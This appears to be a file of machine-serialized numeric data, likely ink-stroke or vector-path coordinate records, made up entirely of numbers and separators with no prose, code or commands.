0 0,-1 0 0,1 1 0,0-1 0,0 0-1,-1 1 1,1-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1-1,0-1 1,-1 1 0,1-1 0,0 0 0,0 1 0,0-1-1,0 1 1,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1-1,0 1 1,0-1 0,0 0 0,0 1 0,0-1 0,0 1-1,1-1 1,-1 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 0-1,0 1 1,0-1 0,1 0 0,0 1 0,3 25 576,-9-16-400,5-10-186,0 0-1,-1 0 1,1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1-1,0-1 1,-1 0 0,1 0 0,0 0 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1-1,0-1 1,0 0 0,0 0 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,1 0 0,-1 0-1,0 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,0 0 0,0 1-1,0-1 1,1 0 0,-1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0 0-1,0-1 1,1 3 9,0-1 1,-1 1-1,1 0 0,-1-1 0,1 1 0,-1 0 0,0-1 0,0 1 1,1 0-1,-1-1 0,-1 1 0,1 0 0,0-1 0,-1 4 1,2 17 88,1-17-83,0 0 0,0-1 0,0 1 0,-1 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,-2 6 0,1 20 86,1-30-88,-11 10 24,11 74-188,0-84 245,-2 48 135,1-47-221,0 0 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,0 1-1,-1-1 1,1 0 0,1 1 0,-1 3 0,0-1 1,0-4-19,-6 3 11,2 23-29,4 38 108,-1-65-89,0 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,0 0 1,1 1-1,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0 0 1,-1-1-1,1 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,0-1 0,0 2 0,0 0 9,0-1-1,0 0-1,1 0 1,-1 0-1,0 0 1,0 1-1,0-1 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,0 0 1,1 0-1,-1 0 1,0-1-1,-1 2 1,1 1 9,0-1 0,1 1-1,-1-1 1,1 1 0,-1-1 0,1 1 0,0-1 0,0 1-1,0-1 1,0 1 0,1 3 0,0 11-47,-1 48 233,0-64-182,0 42 266,0-30-227,0 30-20,0-41-30,0-1 0,0 1 0,0 0 0,0 0 1,0-1-1,0 1 0,-1 0 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 1,0-1-1,0 1 0,0-1 0,-1 2 0,2-3-1,0 0 0,0 0 0,-1 0 0,1 1 0,0-1-1,0 0 1,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 1-1,0-1 1,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1-1,0-1 1,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,1 0-1,-1 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,-2 1 0,2 17 45,-1 5-23,0-21-11,1 0 1,0 0-1,-1 0 1,1 1-1,0-1 1,1 0-1,-1 1 1,1-1-1,-1 0 1,1 1-1,1 6 0,-1-9-3,0 0 22,0 49 402,0 26 43,0-75-417,-11 29 525,11-24-518,0-5-56,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,-1 1 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,-1 1 1,1-1-1,0 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 1,-1 50 1054,2-47-1027,0-3-33,1 0 0,-1 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 1,0 1-1,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 1,0 0-1,0 1 0,-1-1 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,-1 0 1,1 0-1,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,0 0 0,0 0 124,-1 30 1201,1-30-1333,0 1 1,1-1 0,-1 0 0,1 1-1,-1-1 1,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1 0,-1-1-1,1 1 1,0 0 0,-1-1-1,1 1 1,0-1 0,-1 1 0,1 0-1,0-1 1,0 1 0,0 0-1,0 0 1,0-1 0,0 1 0,0 0-1,0-1 1,0 2 0,0-1 487,-1-1-481,1 0-1,-1 0 1,1 0-1,0 1 1,-1-1-1,1 0 1,-1 0 0,1 0-1,0 0 1,-1 1-1,1-1 1,0 0-1,-1 0 1,1 1 0,0-1-1,-1 0 1,1 0-1,0 1 1,-1-1-1,1 0 1,0 1-1,0-1 1,0 1 0,-1-1-1,1 0 1,0 1-1,0-1 1,0 1-1,0-1 1,0 0-1,0 1 1,0 0 0,-2 26 38,1-26-129,0 1 1,0-1-1,0 0 0,0 1 0,0-1 1,0 0-1,-1 1 0,1-1 0,0 0 0,-1 0 1,1 0-1,-1 0 0,-2 1 0,1-1-1948,-2 3-167,-1-3-3125,-14-2-1654,9-4 3433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1 744,'-11'7'3814,"2"4"-1410,8-11-2249,0 1 0,1-1 0,-1 1 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 2 0,-11 16 2980,10-15-2895,0 0 0,0 0 1,0 0-1,-1-1 0,1 1 1,-1-1-1,0 1 0,0-1 1,0 0-1,0 1 0,-1-1 1,0 0-1,1 0 0,-5 3 1,4-4-170,0 1 1,0-1-1,0 1 1,0 0 0,1 0-1,0 0 1,-1 0-1,1 1 1,0-1-1,-1 5 1,-22 27 427,21-32-419,1 2-1,-1-1 1,1 0 0,0 1 0,0 0 0,-4 9 0,5-9 12,-1 0 0,1-1-1,-1 1 1,0 0 0,0-1 0,-8 8 0,-21 29 416,26-36-450,1 1 0,-1 0-1,1 1 1,1-1 0,-6 11-1,6-9-35,-1-1 1,0 0-1,0 0 0,0 0 0,-11 9 0,-18 31 30,4-10 1,22-33-87,9-10-213,3-1-233,-1 9-255,-2-6 121,1 0-1,0 0 0,1 1 0,-1-1 0,1 1 1,0 0-1,-1 0 0,5-4 0,11-13-3315,3-15-2173,-10 16 3099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0 520,'0'0'10624,"2"12"-6249,39 20-1810,-29-28-2426,-1 2-1,0 0 0,0 0 0,0 1 0,-1 0 1,0 1-1,0 0 0,16 18 0,22 16 337,29 30-111,-11-11-24,-55-51-118,-1-1 0,-1 2 0,1-1 0,7 15 0,9 7 69,-20-23-258,-1-3-19,-3-10 118,3-2-170,-3 3-120,-8-5-91,-6-24-3990,-33-34-9038,25 43 9679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73 104,'0'0'692,"-22"-13"3652,22 11-4139,0 0 1,0 0-1,0 0 0,0-1 1,1 1-1,-1 0 1,0 0-1,1 0 0,-1 0 1,1 0-1,0 0 1,0 0-1,0 0 0,0 0 1,1-2-1,-1 3-34,-1 0 0,1 1 0,-1-1-1,0 0 1,1 1 0,-1-1 0,0 0 0,0 0 0,0 1-1,1-1 1,-1 0 0,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,-1 0 0,1 1 0,0-1-1,0 0 1,-1 0 0,1 1 0,0-1 0,-1 0 0,0-1-1,-5 0 3065,3 13-3047,3-10-45,3 0-100,-1 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0-1,-1 0 1,1 1 0,-1-1 0,2 4 0,-2-4 0,20 18 245,-16-17-222,0 1 0,-1 1 0,0-1 0,1 0 0,5 10 0,-3-5 62,1 0 0,1-1 0,15 13 0,-20-18-77,6 5 34,-7-6-44,1 0-1,-1 1 0,1-1 0,-1 1 1,0 0-1,0 0 0,-1 0 1,1 0-1,0 0 0,-1 1 0,0-1 1,0 1-1,0 0 0,3 7 0,-5-8 2,1-1-1,0 1 1,0 0-1,1 0 1,-1-1-1,1 1 1,-1-1-1,1 1 1,0-1-1,0 0 1,0 1-1,2 1 0,-2-2-27,1 0-1,-1 0 1,-1 1-1,1-1 1,0 0-1,0 1 1,-1-1-1,0 1 1,1 0-1,-1-1 1,0 1-1,1 3 0,1-2-23,0-1 0,0 1 0,1-1-1,-1 0 1,1 0 0,6 4-1,-7-6-153,0 1 0,0 0 0,0-1 0,0 0-1,0 1 1,0-1 0,0 0 0,6 0 0,-7-1-86,-1 0-1,0 0 1,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 0-1,1 1 1,-1-1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0-1-1,0 1 1,-1 0 0,1 0 0,0 0 0,0-1 0,9-8-2463,-9 10 2533,-1 0 1,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1-1,1 0 1,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1-1-1,0-5-2682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22 400 224,'-2'5'1138,"-12"7"7920,10-10-8815,2-2 547,3 0-655,-1 1 1,0-1-1,1 1 1,-1 0-1,1-1 0,-1 1 1,1-1-1,-1 0 1,1 1-1,-1-1 0,1 1 1,-1-1-1,1 0 1,-1 1-1,1-1 0,0 0 1,-1 1-1,1-1 1,-1 0-1,1 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,-1 0 1,1 0-1,0 0 1,-1 0-1,1 0 0,0-1 1,-1 1-1,1 0 1,0 0-1,-1-1 0,2 0 1,28-10 263,-18 3-260,-1-1 1,-1 1-1,1-2 1,16-19-1,-1 1-36,5-3-35,80-72 101,-46 47-65,-42 35-15,0 0-1,2 2 0,33-21 0,-42 29-71,-13 9-19,-1-1 1,1 1-1,0 1 1,-1-1-1,1 0 1,0 1-1,0-1 1,0 1 0,6-2-1,-7 3-15,-2 1-196,0 0 98,0 0 0,0-1 0,0 1 0,0 0 1,0-1-1,0 1 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,-1-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,1 0 0,-2 0 0,-30-3-6989,18 2 4332,2 1-492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1 208,'-4'3'18651,"1"1"-14872,-1 1-5152,5-5 1399,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,15 22 349,-13-19-255,-2-2-103,1 1 0,-1-1 0,0 0-1,0 0 1,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0-1,0 0 1,0-1 0,2 4 0,-1-3-6,-1-1 0,0 1 0,0 0 1,0 0-1,0 0 0,0-1 0,-1 1 1,1 0-1,-1 0 0,1 0 0,-1 0 0,1 0 1,-1 4-1,11 25 143,-1 11-40,1 7 40,0-8-64,-11-39-86,1 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,1 0 0,1 3 0,7 19 30,-10-21-31,0-1 0,1 0 0,-1 1-1,1-1 1,0 1 0,0-1-1,0 0 1,0 0 0,0 0-1,3 4 1,-3-4-1,0 0 0,0 0 0,1 0 0,-1 0-1,-1 0 1,1 0 0,0 0 0,0 1 0,-1-1 0,1 4-1,31 48 108,-31-53-104,-1 1-1,1-1 0,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,2 0 0,-2-1-2,0 1 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0-1,0 0 1,-1 1 0,1-1 0,0 2 0,10 45 140,-1-19 48,-10 22-1,11-27-150,-11-23-38,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 1 0,-2-1-1,1-1 0,-1 0 1,0 1-1,1-1 0,-1 0 1,0 1-1,0-1 0,0 0 0,1 1 1,-1-1-1,0 0 0,0 1 1,0-1-1,0 1 0,0-1 1,0 0-1,0 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 1 0,0-1 1,0 0-1,0 1 0,-1-1 1,1 1-1,2 6 98,-2-7-99,1 0 0,-1 0 1,1 0-1,-1 1 0,1-1 1,-1 0-1,0 0 0,1 1 1,-1-1-1,1 0 1,-1 1-1,0-1 0,1 0 1,-1 1-1,0-1 0,1 1 1,-1-1-1,0 0 0,0 1 1,1-1-1,-1 1 1,0-1-1,0 1 0,0-1 1,0 1-1,0-1 0,1 1 1,-1-1-1,0 1 0,0-1 1,0 1-1,0-1 1,-1 1-1,1-1 0,0 1 1,0-1-1,0 1 0,-1 0 1,1 2-6,-1 0 1,1 1-1,0-1 1,0 0 0,0 0-1,0 0 1,0 1-1,1-1 1,1 5-1,-2-8 6,0 0 0,-1 1 0,1-1 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0 1-1,0-1 1,0 0 0,1 0 0,-1 0 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,1 0 0,-1 0 0,0 0-1,0 0 1,4 13 48,-4-12-45,0 0-5,0 3 2,0-3 38,2-14 28,4 9-61,8-3-18,3 0 9,-16 5 1,1 1 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1 1 0,0-1 0,0 0 0,-1 1 0,1-1 1,0 1-1,0-1 0,0 1 0,2 0 0,48-6 45,34 0-16,-76 5-29,0-1 1,0 0-1,-1 0 1,1-1-1,-1-1 1,18-7-1,-26 10 2,0 0 0,0 1 1,0-1-1,0 1 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0 0 1,0 0-1,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 1 0,0-1 1,0 1-1,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1 1 0,7 5-15,9 0 15,-16-7 7,0 0-3,5 0-4,-3 0 3,5 0-3,1 0-4,23 6 13,-31-6-10,0 0-1,1 0 1,-1 1-1,0-1 1,0 1-1,0-1 1,1 1-1,-1 0 0,0 0 1,0 0-1,0 0 1,3 2-1,16 5-2,-7 3 9,-12-9-8,-1-2 3,16-6-29,2 6 73,-18 0-43,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,0 0 0,1 0 1,-1-1-1,0 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0-1 0,1 1 1,-1 0-1,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,2 1-3,5 0 3,-5 0 14,21 6-13,-22-3 0,29-6-6,-18-2-3,-3 4 8,0 1 1,-5 0 2,3 0 0,-5 0-6,0 0-1,5 0 2,-5 0 23,0 0-23,5 0 1,-5 0-3,-1 0 4,7 0 4,-7 0-1,23 0-35,-17 0 34,-5 0 5,10 5-43,-5-4 35,47 11 62,-52-12-53,0 13 76,27-14 330,-28 1 565,-1-1-774,0 2-154,-23 10-1838,14-5 985,8-5 282,-1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 0-1,-1 0 1,1 0 0,0-1-1,0 1 1,-1-1-1,1 0 1,0 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,-5-1 0,-23 0-6780,19 1 3449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16 52,'-2'-11'3932,"-1"10"-3800,3 0 38,-1 1 1,1 0-1,-1-1 1,1 1 0,-1 0-1,1 0 1,-1-1-1,1 1 1,-1 0-1,1 0 1,-1 0-1,0 0 1,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,0 0 1,1 0-1,-1 0 1,1 0-1,-1 1 1,1-1 0,-1 0-1,1 0 1,-1 1-1,1-1 1,-1 0-1,0 1 1,4 2-50,-3-3 32,0 0 1,-1 0 0,1 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,-1 1 462,1-1-462,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,2 36 1135,0-32-1241,-1 0 0,1 0 0,-1 0-1,0 0 1,0 1 0,0-1 0,-1 1 0,1 5 0,7 31 248,-7-36-265,0-1 1,0 0-1,0 1 1,0-1-1,-1 1 1,0-1-1,0 1 0,0 6 1,-1-8-14,1 1 0,0 0 0,0-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,0-1 0,3 7 0,-3-5 5,0 0-1,0 0 1,0 0-1,-1 1 1,1-1-1,-1 0 1,0 0-1,-1 0 1,0 6-1,-1 9 38,-8 25 7,10-41-71,0 0 7,0 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0-1-1,-3 8 0,-7 42 10,8-47-8,1 1 0,0-1 1,0 1-1,0 0 0,1-1 1,0 1-1,1 0 0,-1 0 0,2 13 1,-1-9-4,-11 27 131,1 10-43,-1-6-159,11-40 76,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,-1-1-1,1 1 1,-1-1 0,0 0 0,0 1 0,0-1 0,-2 3 0,2-2-4,0-1 0,0 1 0,0-1 0,1 1 1,-1 0-1,1-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,1 3 1,-1-4-5,1 0 1,-1 1 0,0-1 0,0 0 0,0 0 0,0 0-1,0 0 1,0 1 0,0-1 0,-1 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,1 0 0,-1 0 0,-2 2 0,3-2 2,-1-1 0,1 1 1,-1 0-1,1 0 1,-1-1-1,1 1 1,0 0-1,0 0 1,0 0-1,0-1 1,1 1-1,-1 0 1,0 0-1,1-1 1,-1 1-1,1 0 1,-1-1-1,1 1 0,0 0 1,0-1-1,0 1 1,0-1-1,1 2 1,-1-1-2,0 0 1,0 0 0,-1-1-1,1 1 1,-1 0-1,0 0 1,1 0-1,-1 0 1,0-1 0,0 1-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1 3 1,0 0 7,-10 48 7,12-40-22,-1-11 7,1 0 0,-1-1 1,0 1-1,0-1 0,0 1 0,0 0 1,0-1-1,0 1 0,0-1 1,0 1-1,-1-1 0,1 1 0,-1 0 1,1-1-1,-1 1 0,1-1 1,-1 0-1,0 1 0,0-1 0,0 0 1,0 1-1,-2 1 0,3-3 1,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,-1 1-1,1-1 1,0 0 0,0 1-1,-1-1 1,1 1-1,0-1 1,0 1 0,0-1-1,0 1 1,0-1-1,0 1 1,0-1 0,0 1-1,0-1 1,0 0-1,0 1 1,0-1 0,0 1-1,0-1 1,0 1-1,0-1 1,1 1 0,-1-1-1,0 1 1,0-1-1,1 1 1,0 0 0,-1 0-1,0 0 1,1 0-1,-1 0 1,0 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,0 1 0,-1 2-3,0 0 1,1 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,1 0 0,-1 1-1,1-1 1,0 0 0,0 0-1,2 8 1,-1 13 5,-1-24 1,0 0 5,0 1-11,0-1 0,0 1 1,0-1-1,0 1 1,0-1-1,0 1 0,0 0 1,1-1-1,-1 0 1,1 1-1,-1-1 0,1 1 1,-1-1-1,1 1 1,1 0-1,3 14 11,-5-15 6,-1-1-16,0 0 1,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1-1,-1 0 1,1 0 0,-1 1 0,1-1 0,-1 0 0,1 1-1,-1-1 1,1 1 0,-1-1 0,1 0 0,0 1 0,-1-1 0,1 1-1,0-1 1,-1 1 0,1-1 0,0 1 0,0-1 0,0 1-1,-1 0 1,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1-1,0 0 1,0 27 12,1-17-37,-3-9 17,-5 3 6,7-4 1,-1-1 1,1 0-1,0 0 1,-1 1-1,1-1 1,0 0-1,0 1 1,0-1-1,-1 1 1,1-1-1,0 0 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 1 1,-1-1-1,1 1 1,0-1-1,1 0 1,-1 1-1,0-1 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 1,0 1-1,1-1 1,-1 1-1,-2 5 58,1-5-48,0 0 1,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,-1 1-1,1-1 1,0 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0 0 0,0 4 7,-3 1 21,2-6-23,0-1 0,1 1 0,-1 0 1,0-1-1,1 1 0,-1 0 0,1 0 0,-1 0 1,1 0-1,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,1 1 1,-1 51 521,0-52-522,-11-8-151,0-29-4000,6 12 137,4 22 3654,0 0 0,0 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1-1 1,0 1-1,0 0 0,0 0 0,0-1 0,1-1 0,6-26-3255,-5 0 94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73 648,'-2'-12'4552,"2"12"-4450,-1 0 0,1 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,-1 0-1,1 1 1,0-1-1,-1 0 1,1 0-1,0 0 1,-1 1 0,1-1-1,0 0 1,0 0-1,-1 1 1,1-1-1,0 0 1,0 0-1,-1 1 1,1-1-1,0 0 1,0 1 0,0-1-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 1 1,0-1-1,0 0 1,0 1 0,0-1-1,0 1 1,0-1-1,0 0 1,0 1-1,0-1 1,0 0-1,1 1 1,-1-1 0,0 1 589,24 17 3772,-3-16-3717,22-3 27,-18-3-575,0 2 0,0 0 0,1 2 0,-1 0 0,0 2 1,0 1-1,45 10 0,-54-10-65,1 0 0,-1-2 1,1 0-1,21-1 0,-14-1-9,12 2 118,0-2-1,0-1 1,0-2 0,37-9-1,-58 9-155,-5 1-26,-1 0 0,1 1 0,0 0 0,20-1 0,91-3 208,-103 5-179,0-1 0,32-8 0,-12 3 121,-31 6-189,0 0 0,1 0 0,-1-1 0,0 0 0,0 0 0,7-4 0,31-7 43,-41 13-63,0-1 1,0 1-1,0-1 1,-1 1-1,1 0 1,0 1 0,0-1-1,0 1 1,0-1-1,0 1 1,6 3-1,25 3 1,-27-7 6,-5-1-7,15-10-6,-18 11 5,0 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,1 0 2,0 0 1,0 0-1,0 0 0,0-1 1,0 1-1,0 0 1,1-1-1,-1 0 0,0 1 1,0-1-1,1 0 1,-1 0-1,3 0 0,13 0 2,-16 0-4,0 0 3,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 0,1 0 1,-1-1-1,1 1 0,-1 0 0,1-1 1,-1 1-1,3-2 0,5-1-9,16-5-52,-21 5 51,0 2-3,3 1 9,-5 0 1,0 0 1,0 1-1,1-1 1,-1 0 0,0 1-1,0-1 1,0 1-1,0-1 1,0 1 0,0 0-1,3 2 1,10 1-6,-13-4 13,52 0 29,-45 0-32,-6 0 1,4 0-6,-5 0-7,32 0 49,17 0 464,-50 0-316,-3-1-369,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 1,0 0-1,1 0 0,-1 1 0,0-1 0,-3 1 0,-23-2-5842,7-5-1117,12 1 3367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22 189 516,'0'0'1949,"-21"13"6312,42-9-1119,76 9-5948,-35-12-665,-27 0-132,0-1 0,58-7 1,-59 1-278,0 2 0,38 1 0,132 9 878,-190-7-939,0-1-1,0-1 0,0 1 0,-1-2 1,24-9-1,-20 7 62,0 0 1,28-5 0,-2 4 227,55-16 1,-1 17-329,-85 2-5,1 1 0,0 1 0,22-2 0,-33 4-1,39-12-65,-16 7 66,-21 3-14,0 1-1,0 0 1,0 0 0,0 0-1,0 0 1,0 1-1,1-1 1,4 2 0,185 11 28,-182-11-15,8-1-19,0-2 20,-16 2-12,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,1 0 0,-2 0 0,1 0 0,6-3 1,-7 3 2,32-6 19,-25 7-26,0 0 2,-8 1-2,1-1 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 1,1-1-1,0 1 0,-1 0 0,0-1 1,1 1-1,-1-1 0,1 1 0,-1-1 1,2-1-1,6 1 4,23-1-11,2 3 24,-5 5 28,1-3 0,37 2 0,-65-5-40,21 5 64,-16-11-55,-7 6-12,1-1 0,-1 1 0,0 0-1,1-1 1,-1 1 0,0 0 0,0 0 0,1-1 0,-1 1-1,1 0 1,-1 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1-1,-1 0 1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,0 0 0,1 0 0,-1 1 0,1-1 0,-1 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,1 1 0,-1-1-1,0 0 1,1 0 0,-1 1 0,1 0 0,6 0-4,-1 0-6,9-8 62,-11 6-57,20-3 8,-19 2-3,-3 2-1,32-17 36,-32 16-152,-4 1-169,-22 4-1955,22-4 1863,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0-1 0,0 0 0,0 1 1,0-1-1,0 0 0,0 0 1,0 0-1,0 0 0,-2-2 0,-39-32-10694,32 23 7307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36,'0'0'7180,"9"-6"-5070,-10 6-1908,0 0 0,0 0 0,0 0 0,1 0 1,-1 1-1,0-1 0,0 0 0,0 0 1,1 0-1,-1 1 0,0-1 0,0 0 0,1 1 1,-1-1-1,0 1 0,1-1 0,-1 1 1,1-1-1,-1 1 0,0-1 0,1 1 0,-1 0 1,1-1-1,0 1 0,-1 0 0,1-1 1,-1 1-1,1 0 0,0-1 0,0 1 0,-1 0 1,1 0-1,0 0 0,0-1 0,0 2 1,30 6 441,13 10-280,-35-16-296,-1 0 0,0 0 0,1-1 0,-1 0 0,1 0 0,-1-1 0,1 0 0,0 0 0,13-2 1,23 0 198,-30 4-127,-12-2-129,-1 1 0,1-1 0,0 1 0,-1-1 1,1 0-1,0 0 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1 0 0,0-1 0,-1 1 1,1-1-1,2 0 